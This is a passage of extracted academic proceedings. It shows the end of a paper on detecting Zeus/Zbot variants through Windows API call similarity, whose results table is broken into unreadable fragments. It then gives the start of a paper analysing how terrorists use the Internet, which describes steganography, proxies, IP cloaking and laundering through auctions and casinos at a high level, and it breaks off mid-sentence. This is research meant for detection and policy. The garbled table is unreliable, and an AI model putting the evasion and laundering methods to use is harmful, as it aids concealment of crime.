1 36.19 27.44<br />
71.3<br />
3 41.23 49.47<br />
64.1<br />
8 85.66 48.82<br />
Troj<br />
an.Z<br />
bot-<br />
115<br />
1.m<br />
al<br />
81.3<br />
8<br />
74.6<br />
0<br />
62.0<br />
7<br />
79.1<br />
0<br />
42.6<br />
4<br />
79.6<br />
6<br />
100.<br />
00<br />
60.1<br />
0<br />
74.2<br />
4<br />
76.9<br />
8<br />
81.0<br />
5<br />
67.2<br />
1<br />
74.7<br />
2<br />
74.2<br />
0<br />
81.7<br />
3<br />
78.1<br />
5<br />
74.1<br />
7<br />
62.2<br />
9<br />
82.6<br />
5<br />
57.2<br />
8<br />
DHL<br />
_DO<br />
C.m<br />
al<br />
94.4<br />
6<br />
82.9<br />
1<br />
73.7<br />
4<br />
66.5<br />
3<br />
68.1<br />
3<br />
86.2<br />
4<br />
59.7<br />
3<br />
100.<br />
00<br />
90.7<br />
7<br />
88.7<br />
8<br />
79.3<br />
2<br />
88.5<br />
8<br />
79.6<br />
6<br />
71.8<br />
5<br />
91.7<br />
5<br />
80.0<br />
6<br />
72.9<br />
7<br />
53.7<br />
2<br />
71.6<br />
6<br />
73.7<br />
6<br />
Troj<br />
an.<br />
Spy.<br />
Zeu<br />
s.1.<br />
Gen<br />
.mal<br />
68.9<br />
1<br />
57.0<br />
6<br />
71.5<br />
6<br />
61.7<br />
5<br />
51.3<br />
0<br />
71.8<br />
5<br />
68.9<br />
8<br />
47.2<br />
8<br />
100.<br />
00<br />
86.4<br />
1<br />
77.8<br />
9<br />
83.5<br />
2<br />
85.1<br />
6<br />
72.7<br />
1<br />
59.1<br />
7<br />
79.5<br />
9<br />
68.1<br />
6<br />
41.1<br />
5<br />
57.5<br />
6<br />
70.8<br />
3
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Zb<br />
ot-<br />
1307.mal<br />
Trojan.Zb<br />
ot-<br />
2163.mal<br />
Tro<br />
jan.<br />
Sp<br />
y.Z<br />
eus<br />
.1.<br />
Ge<br />
n.<br />
mal<br />
54.<br />
23<br />
57.<br />
10<br />
63.<br />
53<br />
Troj<br />
an.Z<br />
bot-<br />
85.<br />
mal<br />
Madhu Shankarapani and Srinivas Mukkamala<br />
Troja<br />
n.Spy<br />
.Zeus<br />
.2.Ge<br />
n.mal<br />
63.8<br />
2 78.15<br />
58.4<br />
6 63.92<br />
56.5<br />
1 81.88<br />
Troj<br />
an.B<br />
roke<br />
r-<br />
12.<br />
mal<br />
61.3<br />
3<br />
78.4<br />
7<br />
84.0<br />
4<br />
5. Similarity analysis results<br />
Troj<br />
an.<br />
Zbo<br />
t-<br />
134<br />
2.m<br />
al<br />
86.<br />
42<br />
82.<br />
03<br />
74.<br />
65<br />
Troj<br />
an.<br />
Spy<br />
.Ze<br />
us.<br />
1.G<br />
en.<br />
mal<br />
66.<br />
27<br />
60.<br />
21<br />
55.<br />
75<br />
Troj<br />
an.S<br />
py.Z<br />
eus.<br />
1.Ge<br />
n.m<br />
al<br />
59.4<br />
5<br />
59.6<br />
4<br />
68.0<br />
1<br />
Troj<br />
an.S<br />
py.Z<br />
eus.<br />
1.Ge<br />
n.m<br />
al<br />
Troja<br />
n.Zbo<br />
t-<br />
290.<br />
mal<br />
Troja<br />
n.Spy<br />
.Zeus<br />
.1.Ge<br />
n.mal<br />
66.6<br />
9 76.85 58.62<br />
54.5<br />
9 64.83 64.50<br />
60.6<br />
6 50.08 60.47<br />
We apply the traditional similarity functions on Vs’ and Vu’. Cosine measure, extended Jaccard<br />
measure, and the Pearson correlation measure are the popular measures of similarity for sequences.<br />
The cosine measure is given below and captures a scale-invariant understanding of similarity.<br />
Cosine similarity: Cosine similarity is a measure of similarity between two vectors of n dimensions<br />
by finding the angle between them.<br />
Extended Jaccard measure: The extended Jaccard coefficient measures the degree of overlap<br />
between two sets and is computed as the ratio of the number of shared attributes ofVs’ AND Vu’to the<br />
number possessed byVs’ORVu’.<br />
Pearson correlation: Correlation gives the linear relationship between two variables. For a series of<br />
n measurements of variablesVs’andVu’, Pearson correlation is given by the formula below.<br />
Where and are values of variable Vs’ and Vu’ respectively at position i, n is the number of<br />
measurements, and are standard deviations of Vs’ and Vu’ respectively and and are<br />
means of Vs’ and Vu’ respectively.<br />
In these experiments, we calculated the mean value of the three measures. For a particular measure<br />
between a virus signature and a suspicious binary file, S(m)(Vs’i, Vu’), which stands for the similarity<br />
between virus signature i and a suspicious binary file. Our similarity report is generated by calculating<br />
the S(m)(Vs’i, Vu’) value for each virus signature in the signature database.<br />
In this experiment, we compared Zeus/Zbot variants against itself, creating n-by-n matrix which shows<br />
how similar are the variants. Table 1 shows the similarity values of Zeus/Zbot compared among<br />
themselves. From the Table 1 we can infer that variants of Zeus/Zbot are almost similar to sequence<br />
in which the Windows APIs are called.<br />
6. Conclusion<br />
In this paper, we present our effort of approach on malware detection based on Windows API call<br />
sequence. According to our observations, though there is tremendous increase in Zeus/Zbot variant<br />
builders, its behavior of API calls remains almost the same. Thus our approach can detect its variants<br />
258<br />
Troj<br />
an.Z<br />
bot-<br />
115<br />
1.m<br />
al<br />
74.0<br />
3<br />
73.5<br />
8<br />
78.3<br />
0<br />
DHL<br />
_DO<br />
C.m<br />
al<br />
(3)<br />
80.9<br />
5<br />
64.2<br />
9<br />
50.7<br />
3<br />
(1)<br />
(2)<br />
Troj<br />
an.<br />
Spy.<br />
Zeu<br />
s.1.<br />
Gen<br />
.mal<br />
87.5<br />
1<br />
54.3<br />
4<br />
56.1<br />
0
Madhu Shankarapani and Srinivas Mukkamala<br />
very robust and efficiently. Experimental results show that our method is able to show how similar are<br />
these variants, which have evaded the present virus defense systems. From this method it shows how<br />
accurately we can detect Zeus/Zbot variants.<br />
References<br />
Bell, Henry and Chien, Eric. (2010) Trojan.Vundo, Symantec Technical Report [online], 17 Mar, Available:<br />
http://www.symantec.com/security_response/writeup.jsp?docid=2004-112111-3912-99 [12 Sep 2010].<br />
Chen, C. and Shi, Y. Q. (2008) “JPEG image steganalysis utilizing both intrablock and interblock correlations”,<br />
IEEE International Symposium on Circuits and Systems, Seattle, WA, 18-21 May.<br />
Cooke, E., Jahanian, F. and McPherson, D. (2006) “The zombie roundup: Understanding, detecting, and<br />
disrupting botnets”, in Usenix Workshop on Steps to Reducing Unwanted Traffic on the Internet (SRUTI).<br />
Freiling, F., Holz, T. and Wicherski, G. (2005) “Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />
Distributed Denial-of-Service Attacks”, in <strong>European</strong> Symposium on Research in Computer Security<br />
(ESORICS).<br />
Fridrich, J. (2004) "Feature-based steganalysis for JPEG images and its implications for future design of<br />
steganographic schemes", in Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp. 67-81.<br />
Holz, T., Engelberth, M. and Freiling, F. (2008) Learning More About the Underground Economy: A Case-Study<br />
of Keyloggers and Dropzones, ReiheInformatik TR-2008-006, University of Mannheim.<br />
Kanich, C., Levchenko, K., Enright, B., Voelker, G. and Savage, S. (2008) “The Heisenbot Uncertainty Problem:<br />
Challenges in Separating Bots from Chaff”, in USENIX Workshop on Large-Scale Exploits and Emergent<br />
Threats.<br />
Karasaridis, A., Rexroad, B. and Hoeflin, D. (2007) “Wide-scale botnet detection and characterization”, in<br />
USENIX Workshop on Hot Topics in Understanding Botnet.<br />
Lyu, S. and Farid, H. (2002) "Detecting hidden messages using higher order statistics and support vector<br />
machines", in Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.<br />
McMillan, Robert and Kirk, Jeremy. (2010) US charges 60 in connection with Zeus Trojan [online], 30 Sep,<br />
Available: http://www.csoonline.com/article/620830/us-charges-60-in-connection-with-zeus-trojan [1 Oct<br />
2010].<br />
Moscaritolo, Angela. (2009) New Verizon Wireless-themed Zeus campaign hits [online], 16 Nov,<br />
Available:http://www.scmagazineus.com/new-verizon-wireless-themed-zeus-campaign-hits/article/157848<br />
[8 Sep 2010].<br />
Nichols, Shaun. (2009) UCSB researchers hijack Torpig botnet [online], V3.co.uk, 04 May, Available:<br />
http://www.v3.co.uk/vnunet/news/2241609/researchers-hijack-botnet [06 May 2009].<br />
Offensive Computing [online], Available: http://offensivecomputing.net [21 Jul 2010].<br />
Pevny, T., and Fridrich, J. (2007) “Merging Markov and DCT features for multi-class JPEG steganalysis”, in<br />
Proceedings of SPIE Electronic Imaging, Photonics West, pp. 03-04.<br />
Qureshi, Mohammad. MBCS, MIET [online], Available: http://umer.quresh.info/Network%20Attacks.pdf [13-Dec-<br />
2010].<br />
Ragan, Steve. (2009) ZBot data dump discovered with over 74,000 FTP credentials [online], 29 Jun, Available:<br />
http://www.thetechherald.com/article.php/200927/3960/ZBot-data-dump-discovered-with-over-74-000-FTPcredentials<br />
[5 Jul 2009].<br />
Rajab, M. A., Zarfoss, J., Monrose, F. and Terzis, A. (2006) “A Multifaceted Approach to Understanding the<br />
Botnet Phenomenon”. ACM Internet Measurement <strong>Conference</strong> (IMC).<br />
Rajab, M. A., Zarfoss, J., Monrose, F. and Terzis, A. (2007) “My Botnet is Bigger than Yours (Maybe, Better than<br />
Yours): Why Size Estimates Remain Challenging”, in USENIX Workshop on Hot Topics in Understanding<br />
Botnet.<br />
Ramachandran, A., Feamster, N. and Dagon, D. (2006) “Revealing Botnet Membership Using DNSBL Counter-<br />
Intelligence”, in <strong>Conference</strong> on Steps to Reducing Unwanted Traffic on the Internet.<br />
Sallee, P. (2005) “Model based methods for steganography and steganalysis”, International Journal of Image and<br />
Graphics, Vol. 5, No. 1, 2005, 167-189.<br />
SHEVCHENKO, SERGEI. (2009) Time to Revisit Zeus Almighty [online], 16 Sep, Available:<br />
http://blog.threatexpert.com/2009_09_01_archive.html [19 Sep 2009].<br />
Shi, Y. Q., Chen, C. and Chen, W. (2006) "A Markov process based approach to effective attacking JPEG<br />
steganography", in Proceedings of the 8th international conference on Information hiding.<br />
Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) "YASS: Yet another steganographic scheme that resists blind<br />
steganalysis", in Proceedings of 9th Information Hiding Workshop, ISBN:3-540-77369-X 978-3-540-77369-<br />
6, pp. 16-31, Saint Malo, France.<br />
Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B., Szydlowski, M., Kemmerer, R., Kruegel, C. and Vigna, G.<br />
(2009) “Your Botnet is My Botnet: Analysis of a Botnet Takeover”, CCS’09, 9–13 Nov, Chicago, Illinois,<br />
USA.<br />
Westfeld, A. (2001) “High capacity despite better steganalysis (F5-a steganographic algorithm)”, Information<br />
Hiding, 4th International Workshop, LNCS 2137, pp. 289-302, Springer-Verlag Berlin Heidelberg.<br />
Zeus (trojan horse). Wikipedia [online], Available: http://en.wikipedia.org/wiki/Zeus_(trojan_horse), [12 Sep 2010].<br />
Zhuang, L., Dunagan, J., Simon, D., Wang, H., Osipkov, I., Hulten, G. and Tygar, J. (2008) “Characterizing<br />
botnets from email spam records”, in USENIX Workshop on Large-Scale Exploits and Emergent Threats.<br />
259
Terrorist use of the Internet: Exploitation and Support<br />
Through ICT Infrastructure<br />
Namosha Veerasamy and Marthie Grobler<br />
Council for Scientific and Industrial Research, Pretoria, South Africa<br />
nveerasamy@csir.co.za<br />
mgrobler1@csir.co.za<br />
Abstract: The growth of technology has provided a wealth of functionality. One area in which Information<br />
Communication Technology (ICT), especially the Internet, has grown to play a supporting role is terrorism. The<br />
Internet provides an enormous amount of information, and enables relatively cheap and instant communication<br />
across the globe. As a result, the conventional view of many traditional terrorist groups shifted to embrace the<br />
use of technology within their functions. The goal of this paper is to represent the functions and methods that<br />
terrorists have come to rely on through the ICT infrastructure. The discussion sheds light on the technical and<br />
practical role that ICT infrastructure plays in the assistance of terrorism. The use of the Internet by terrorist<br />
groups has expanded from traditional Internet usage to more innovative usage of both traditional and new<br />
Internet functions. Global terrorist groups can now electronically target an enormous amount of potential<br />
recipients, recruitees and enemies. The aim of the paper is to show how the Internet can be used to enable<br />
terrorism, as well as provide technical examples of the support functionality and exploitation. This paper<br />
summarises the high-level functions, methods and examples for which terrorists utilise the Internet. This paper<br />
looks at the use of the Internet as both a uni-directional and bi-directional tool to support functionality like<br />
recruitment, propaganda, training, funding and operations. It also discusses specific methods like the<br />
dissemination of web literature, social-networking tools, anti-forensics and fund-raising schemes. Additional<br />
examples, such as cloaking and coding techniques, are also provided. In order to analyse how ICT infrastructure<br />
can be used in the support of terrorism, a mapping is given of communication direction to the traditional Internet<br />
use functions and methods, as well as to innovative Internet functions and methods.<br />
Keywords: anti-forensics, internet, terrorism, ICT, propaganda, social-networking<br />
1. Introduction<br />
According to the Internet World Stats webpage, the latest number of world Internet users (calculated<br />
30 June 2010) are 1 966 541 816 representing a 28.7% penetration of the world population (2010).<br />
Although this does not reflect a majority of the world population, it presents an enormous amount of<br />
potential recipients, recruitees and enemies that global terrorist groups can target electronically.<br />
However, terrorist groups’ embracing of technology used to be an uncommon phenomenon.<br />
In the book, The secret history of al Qaeda, an eye witness to the al Qaeda men fleeing United States<br />
bombardments of their training camps in November 2001 are quoted: "Every second al Qaeda<br />
member [was] carrying a laptop computer along with his Kalashnikov" (Atwan 2006). This scenario is<br />
highly paradoxical where an organisation utterly against the modern world (such as al Qaeda), are<br />
increasingly relying on hi-tech electronic facilities offered by the Internet to operate, expand, develop<br />
and survive. Especially in the early 1980s, some groups in Afghanistan were opposed to using any<br />
kind of technology that is of largely Western origin or innovation (Atwan 2006).<br />
However, the world has changed. Technology has been introduced in most aspects of daily lives and<br />
the Internet has become a prominent component of business and private life. It provides an enormous<br />
amount of information and enables relatively cheap and instant communication across the globe. As a<br />
result, the traditional view of many traditional terrorist groups shifted to embrace the use of technology<br />
within their functions. In 2003, a document titled 'al Qaeda: The 39 principles of Jihad' was published<br />
on the al-Farouq website. Principle 34 states that 'performing electronic jihad' is a 'sacred duty'. The<br />
author of the principle document calls upon the group's members to participate actively in Internet<br />
forums. He explains that the Internet offers the opportunity to respond instantly and to reach millions<br />
of people in seconds. Members who have Internet skills are urged to use them to support the jihad by<br />
hacking into and destroying enemy websites (Atwan 2006).<br />
Keeping this principle in mind, the use of the Internet by terrorist groups has expanded from only<br />
traditional Internet usage to more innovative usage of both traditional and new Internet functions. This<br />
paper will summarise the high-level functions, methods and examples for which terrorists utilise the<br />
Internet. The examples and methods often provide for various functions and thus a strict one-to-one<br />
260
Namosha Veerasamy and Marthie Grobler<br />
mapping cannot be provided. Rather, the examples given shed light on the technical and practical role<br />
that ICT infrastructure plays in the support of terrorism.<br />
2. Functionality of the internet<br />
Terrorists use the Internet because it is easy and inexpensive to disseminate information<br />
instantaneously worldwide (Piper 2008). By its very nature, the Internet is in many ways an ideal<br />
arena for activity by terrorist groups. The Internet offers little or no regulation, is an anonymous<br />
multimedia environment, and has the ability to shape coverage in the traditional mass media<br />
(Weimann 2005).<br />
Whilst the Internet was originally created to facilitate communication between two computers, its<br />
functionality now extends to information repository as well. Figure 1 shows the general functions that<br />
terrorists may use the Internet for, with an indication of which type of methods are used for each<br />
functionality type.<br />
Recruitment – the process of attracting, screening and selecting individuals to become members<br />
of the terrorist groups; both web literature and social networking tools can be applied for this<br />
purpose.<br />
Training – the process of disseminating knowledge, skills and competency to new recruits with<br />
regard to specific topics of knowledge that may be needed during terrorist operations; social<br />
networking tools and anti-forensics methods are employed for this purpose.<br />
Communication – the process of conveying information to members of the terrorist group; social<br />
networking tools and anti-forensics methods are employed for this purpose.<br />
Operations – the direction and control of a specific terrorist attack; web literature, anti-forensics<br />
and fundraising methods are employed for this purpose.<br />
Propaganda – a form of communication aimed at influencing the terrorist community toward a<br />
specific cause; both web literature and social networking tools can be applied for this purpose.<br />
Funding – financial support provided to make a specific terrorist operation possible; fundraising<br />
methods are used for this purpose.<br />
Psychological warfare – the process of spreading disinformation in an attempt to deliver threats<br />
intended to distil fear and helplessness within the enemy ranks; both web literature and social<br />
networking tools can be applied for this purpose.<br />
The Internet is the perfect tool to exploit in order to support terrorist activities. Not only does it provide<br />
location independence, speed, anonymity and internationality, but is also provides a relatively low<br />
cost-benefit ratio (Brunst 2010), making it a desirable tool. Figure 1 shows the complexity of terrorist<br />
groups' use of the Internet (as both traditional communication and information gathering tool) in<br />
innovative new ways. The Internet is also used as both uni-directional and bi-directional<br />
communication tool.<br />
Although this list of functionalities is not exhaustive, it provides a better understanding of the need for<br />
specific methods to exploit the ICT infrastructure to support terrorist activities. The next section<br />
discusses the methods in more detail, and explains these with actual examples.<br />
3. Exploiting the ICT infrastructure to support terrorist activities<br />
For the purpose of this article, Internet exploitation methods are divided into four distinct groups: web<br />
literature, social networking tools, anti-forensics and fundraising. Figure 2 shows these groups with<br />
some examples of how the methods may be employed.<br />
3.1 Web literature<br />
Web literature refers to all writings published on the web in a particular style on a particular subject.<br />
Some of the types of web literature facilitated by terrorist groups include published periodicals and<br />
essays, manuals, encyclopaedias, poetry, videos, statements and biographies. Since web literature<br />
often takes on the form of mass uni-directional communication, this media is ideal for terrorist use in<br />
recruitment, operations, training and propaganda.<br />
261
Namosha Veerasamy and Marthie Grobler<br />
Figure 1: The Internet as terrorist supporting mechanism<br />
Figure 2: Examples of how terrorists may use the Internet<br />
262
Namosha Veerasamy and Marthie Grobler<br />
Radio Free Europe/Radio Liberty compiled a special report on the use of media by Sunni Insurgents<br />
in Iraq and their supporters worldwide. This report discusses the products produced by terrorist media<br />
campaigns, including text, audiovisual and websites (Kimmage, Ridolfo 2007). The distribution of text<br />
and audiovisual media is a traditional use of the Internet, with little innovative application. Text media<br />
include press releases, operational statements, inspirational texts and martyr biographies. Audiovisual<br />
media include recordings of al Qaeda operations in Iraq (Atwan 2006). Online training material can<br />
provide detailed instructions on how to make letter bombs; use poison and chemicals; detonate car<br />
bombs; shoot US soldiers; navigate by the stars (Coll, Glasser 2005) and assemble a suicide bomb<br />
vest (Lachow, Richardson 2007).<br />
The use of dedicated websites within terrorist circles is prominent. By the end of 1999, most of the 30<br />
organisations designated as Foreign Terrorist Organisations had a maintained web presence<br />
(Weimann 2009). In 2006, this number has grown to over 5000 active websites (Nordeste, Carment<br />
2006). These websites generally provide current activity reports and vision and mission statements of<br />
the terrorist group. Sympathetic websites focus largely on propaganda. These websites have postings<br />
of entire downloadable books and pamphlet libraries aimed at indoctrinating jihadi sympathizers and<br />
reassuring already indoctrinated jihadists (Jamestown Foundation 2006). Pro-surgent websites focus<br />
on providing detailed tutorials to group members, e.g. showing how to add news crawls that provide<br />
the latest, fraudulent death toll for US forces in Iraq.<br />
According to an al Qaeda training manual, it is possible to gather at least 80% of all information<br />
required about the enemy, by using public Internet sources openly and without resorting to illegal<br />
means (Weimann 2005). More than 1 million pages of historical government documents have been<br />
removed from public view since the 9/11 terror attacks. This record of concern program aims to<br />
"reduce the risk of providing access to materials that might support terrorists". Among the removed<br />
documents is a database from the Federal Emergency Management Agency with information about all<br />
federal facilities, and 200 000 pages of naval facility plans and blueprints. The data is removed from<br />
public domain, but individuals can still request to see parts of the withdrawn documents under the<br />
Freedom of Information Act (Bass, Ho 2007).<br />
Other examples of web literature and information collected through the Internet include maps, satellite<br />
photos of potential attack sites, transportation routes, power and communication grids, infrastructure<br />
details, pipelines systems, dams and water supplies, information on natural resources and email<br />
distribution lists. Although this type of information may not necessarily be useful in cyberterrorism<br />
activities, it can be used to plan traditional terrorism activities without actually going to the<br />
geographical location of the target. Some terrorist groups have recently been distributing flight<br />
simulation software. Web literature can thus be used in the initial recruitment campaigns by glorifying<br />
terrorism through inspirational media, as well as the training of members, propaganda and the<br />
operations of the terrorist group.<br />
3.2 Social networking tools<br />
Social networking tools focus on building and reflecting social networks or social relations among<br />
people who share a common interest. Some types of social networking tools facilitated by terrorist<br />
groups include online forums and blogs, websites, games, virtual personas, music and specialised<br />
applications. Social networking tools offer both uni-directional and bi-directional communications, and<br />
can be used for recruitment, training, propaganda and communication within terrorist groups.<br />
Social networking and gaming sites often require new members to create accounts by specifying their<br />
names, skills and interests. Through the creation of these virtual personas, terrorist groups are able to<br />
gather information on potential recruits. Individuals with strong technical skills in the fields of<br />
chemistry, engineering or weapons development can be identified and encouraged to join the group.<br />
This type of information can be derived from interactions in social networking sites, forums and blogs<br />
where users share information about their interests, beliefs, skills and careers. Online gaming sites<br />
also provide a source of potential members. For example, terrorist groups identify online players with<br />
a strong shooting ability that might be indicative of violent tendencies. In some terrorist groups, this<br />
type of temperament would be ideal for operational missions.<br />
In addition to traditional social networking sites like Facebook and MySpace, Web 2.0 technologies<br />
evolved to customisable social networking sites. West and Latham (2010) state that social networking<br />
creation sites are an online extremist's dream - it is inexpensive, easy-to-use, highly customisable and<br />
263
Namosha Veerasamy and Marthie Grobler<br />
conducive to online extremism. Ning users, for example, can create an individualised site where users<br />
have the ability to upload audio and video files, post and receive messages and blog entries, create<br />
events and receive RSS feeds. If a terrorist group sets up a customised social site, they would have<br />
the ability to control access to members, post propaganda videos and even use the site for<br />
fundraising.<br />
Another way of promoting a cause is with music (Whelpton 2009). Islamic and white supremist groups<br />
perform captivating songs with pop and hip-hop beats that often attract young influential teenagers.<br />
The lyrics of the music promote the cause and the catchy beats keep the youth captivated.<br />
Other examples of social networking include chat rooms, bulletin boards, discussion groups and micro<br />
blogging (such as Twitter). The type of social networking used by terrorist groups depends on the<br />
group’s infrastructure, ability and personal preference. For example, al Qaeda operatives use the<br />
Internet in public places and communicate by using free web based email accounts. For these public<br />
types of communication, instructions are often delivered electronically through code, usually in<br />
difficult-to-decipher dialects for which Western intelligence and security services have few or no<br />
trained linguists (Nordeste, Carment 2006).<br />
3.3 Anti-forensics<br />
Anti-forensics is a set of tools or methods used to counter the use of forensic tools and methods.<br />
Some of the identified types of anti-forensic measures include steganography, dead dropping,<br />
encryption, IP-based cloaking, proxies and anonymising. Since anti-forensic measures mostly offer<br />
targeted uni-directional communication, it is ideal for training, operations and communication within<br />
terrorist groups.<br />
Steganography is a method of covertly hiding messages within another. This is done by embedding<br />
the true message within a seemingly innocuous communication, such as text, image or audio. Only<br />
individuals that know of the hidden message and have the relevant key will be able to extract the<br />
original message from the carrier message. The password or passphrase is delivered to the intended<br />
recipient by secure alternative means (Lau 2003). Although it is difficult to detect the modified carrier<br />
media visually, it is possible to use statistical analysis. The February 2007 edition of Technical<br />
Mujahid contains an article that encourages extremists to download a copy of the encryption program<br />
“Secrets of the Mujahideen” from the Internet (2007). The program hid data in the pixels of the image<br />
and compressed the file to defeat steganalysis attempts.<br />
Another technique that would bypass messaging interception techniques is the use of virtual dead<br />
dropping, or draft message folders. Bruce Hoffman from Rand Corp. (in (Noguchi, Goo 2006)) states<br />
that terrorists create free web based email accounts and allow others to log into the accounts and<br />
read the drafts without the messages ever been sent. The email account name and password is<br />
transmitted in code in a chat forum or secure message board to the intended recipients. This<br />
technique is used especially for highly sensitive information (Nordeste, Carment 2006) and if<br />
electronic interception legislation may come into play.<br />
Redirecting of traffic through IP-based cloaking is another anti-forensic technique. At a seminar in<br />
FOSE 2006, Cottrell (in ((Carr 2007))) stated that: “When the Web server receives a page request, a<br />
script checks the IP address of the user against a list of known government IP addresses. If a match<br />
is found, the server delivers a Web page with fake information. If no match is found, the requesting<br />
user is sent to a Web page with real information”. From this, the expression cloaking as the authentic<br />
site is masked. This also leads to a similar technique called IP-based blocking that prevents users’<br />
access to a site instead of redirecting the traffic.<br />
Other techniques include the use of a proxy and secure channel to hide Internet activity. The Search<br />
for International Terrorist Entities Institute (SITE) detected a posting that encouraged the use of a<br />
proxy as it erases digital footsteps such as web addresses and other identifiable information (Noguchi,<br />
Goo 2006). The premise of this approach is that the user connects to a proxy that requests an<br />
anonymising site to redirect the user to the target site. The connection to the proxy is via a secure<br />
encrypted channel that hides the originating user’s details. The well-known cyber user Irhabi 007<br />
(Terrorist 007) also provided security tips by distributing anonymising software that masks an IP<br />
address (Labi 2006).<br />
264
Namosha Veerasamy and Marthie Grobler<br />
Another innovative use of the Internet is provided by spammimic.com. Spam (unsolicited distribution<br />
of mass email communication) has become a nuisance for the average netizen. Most people<br />
automatically delete these messages or send it to the spam folder. Spammimic.com provides an<br />
interesting analogue of encryption software that hides messages within the text of ordinary mail. It<br />
does not provide true encryption, but hides the text of a short message into what appears to be an<br />
average spam mail. Not only will the messages be disguised, but few people will take the chance to<br />
open the email in fear of attached malware. Thus, only the intended recipients will know about the<br />
disguised messages and decode it through the web interface (Tibbetts 2002).<br />
3.4 Fundraising<br />
Fundraising is the process of soliciting and gathering contributions by requesting donations, often in<br />
the form of money. Some of the identified types of fundraising methods include donations,<br />
auctioneering, casinos, credit card theft, drug trafficking and phishing. Since fundraising methods<br />
mostly offer targeted communication, it can be used for operations and funding activities.<br />
Since the 9/11 terrorist attack, terrorist groups have increasingly relied on the Internet for finance<br />
related activities. Popular terrorist organisation websites often have links such as “What You Can Do”<br />
or “How Can I Help”. Terrorist websites publish requests for funds by appealing to sympathetic users<br />
to make donations and contribute to the funding of activities. Visitors to such websites are monitored<br />
and researched. Repeat visitors or individuals spending extended periods on the websites are<br />
contacted (Piper 2008). These individuals are guided to secret chat rooms or instructed to download<br />
specific software that enables users to communicate on the Internet without being monitored<br />
(Nordeste, Carment 2006).<br />
However, malicious or disguised methods of fundraising are also possible. Electronic money transfer,<br />
laundering and generating support through front organisations are all fundraising methods used by<br />
terrorists (Goodman, Kirk & Kirk 2007). According to the Financial Action Task Force, “the misuse of<br />
nonprofit organizations for the financing of terrorism is coming to be recognized as a crucial weak<br />
point in the global struggle to stop such funding at its source” (Jacobson 2009). Examples of such<br />
undertakings include Mercy International, Rabita Trust, Global Relief Fund, and Help the Needy<br />
(Conway 2006). Some charities are founded with the express purpose of financing terror, while others<br />
are existing entities that are infiltrated by terrorist supporters from within (Jacobson 2009).<br />
Other methods related to fundraising include online auctioneering to move money around. This<br />
involves two partners, known as smurfs, to arrange a fake transaction. One partner bids on an item<br />
and pays the auction amount to the auction house. The other partner receives payment for the fake<br />
auction item. There are also scams where users bid on their own items in an effort to store money and<br />
prevent detection (Whelpton 2009). In one specific auction, a set of second-hand video games were<br />
offered for $200, whilst the same set could be purchased brand new from the publisher for $39.99<br />
(Tibbetts 2002). Although the ludicrously high selling price is not illegal, this item will only attract<br />
selected attention from a trusted agent. This allows terrorist groups to move money around without<br />
actually delivering the auctioned goods or services.<br />
Online casinos can be used for both laundering and storing money. When dealing with large sums of<br />
money, terrorists can place it in an online gambling site. Small bids are made to ensure activity, while<br />
the rest of the money is safely stored and hidden (Whelpton 2009). Alternatively, any winnings can be<br />
cashed in and transferred electronically to bank accounts specifically created for this purpose<br />
(Jacobson 2009).<br />
Stolen credit cards can help to fund many terrorist activities. For example, Irhabi 007 and his<br />
accomplice accumulated 37 000 stolen credit card numbers, making more than $3.5 million in charges<br />
(Jacobson 2009). In 2005, stolen credit card details were used to purchase domain space with a<br />
request stemming from Paris. When a similar request for nearby domain space was requested, shortly<br />
after the initial request, through another name in Britain, it was detected as fraud and the backup files<br />
of the initial site was investigated. Although the files were mostly Arabic, video footage includes<br />
insurgent forces clashing with American forces, depicting Iraqi conflict from the attacker’s point of view<br />
(Labi 2006).<br />
Drug trafficking is considered a large income source for terrorist groups. Fake Internet drugs are<br />
trafficked, containing harmful ingredients such as arsenic, boric acid, leaded road paint, polish, talcum<br />
265
Namosha Veerasamy and Marthie Grobler<br />
powder, chalk and brick dust. In an elaborate scheme, Americans were tricked in believing they are<br />
buying Viagra, but instead they received fake drugs. The money paid for these drugs is used to fund<br />
Middle Eastern terrorism. The UK Medicine and Healthcare Regulatory Agency reports that up to 62%<br />
of the prescription medicine on sale on the Internet, without requiring a prescription, are fake<br />
(Whelpton 2009).<br />
3.5 Other examples of the exploitation of the ICT infrastructure<br />
Kovner (in (Lachow, Richardson 2007)) discusses one of al Qaeda’s goals of using the Internet to<br />
create resistance blockades to prevent Western ideas from corrupting Islamic institutions. In some<br />
instances, Internet browsers designed to filter out content from undesirable Western sources were<br />
distributed without users being aware of it. Brachman also discusses jihadi computer programmers<br />
launching browsing software, similar to Internet Explorer that searches only particular sites and thus<br />
restricts the freedom to navigate to certain online destinations (2006).<br />
Another technique from the infamous terrorist Irhabi 007 was to exploit vulnerabilities in FTP servers,<br />
reducing risk from exposure and saving money. Irabhi dumped files (with videos of Bin Laden and<br />
9/11 hijackers) onto an FTP server at the Arkansan State Highway and Transport Department and<br />
then posted links warning users of the limited window of opportunity to download (Labi 2006).<br />
SITE (in (Brachman 2006)) discovered a guide for jihadis to use the Internet safely and anonymously.<br />
This guide explains how governments identify users, penetrate their usage of software chat programs<br />
(including Microsoft Messenger and Paltalk), and advise readers not to use Saudi Arabian based<br />
email addresses (ending with .sa) due to its insecure nature. Readers are advised to rather register<br />
from anonymous accounts from commercial providers like Hotmail or Yahoo!.<br />
Cottrell in 2006 (in (Dizard 2006)) discusses the following emerging cloaking trends:<br />
Terrorist organisations host bogus websites that mask their covert information or provide<br />
misleading information to users they identify as federal employees or agents;<br />
Criminal and terrorist organisations are increasingly blocking all traffic from North America or from<br />
IP addresses that point back to users who rely on the English language;<br />
Another cloaking practice is the provision of fake passwords at covert meetings. When one of the<br />
fake passwords are detected, the user is flagged as a potential federal intelligence agent who has<br />
attended the meetings, which in turn makes them vulnerable to being kidnapped or becoming the<br />
unwitting carriers of false information; and<br />
Another method was used in a case in which hackers set a number of criteria that they all shared<br />
using the Linux operating system and the Netscape browser, among other factors. When federal<br />
investigators using computers running Windows and using Internet Explorer visited the hackers'<br />
shared site, the hackers' system immediately mounted a distributed denial-of-service attack<br />
against the federal system.<br />
Sometimes communication between terrorists occurs through a special code developed by the group<br />
itself. By using inconspicuous word and phrases, it is possible to deliver these messages in a public<br />
forum without attracting untoward attention. For example, Mohammed Atta’s final message to the<br />
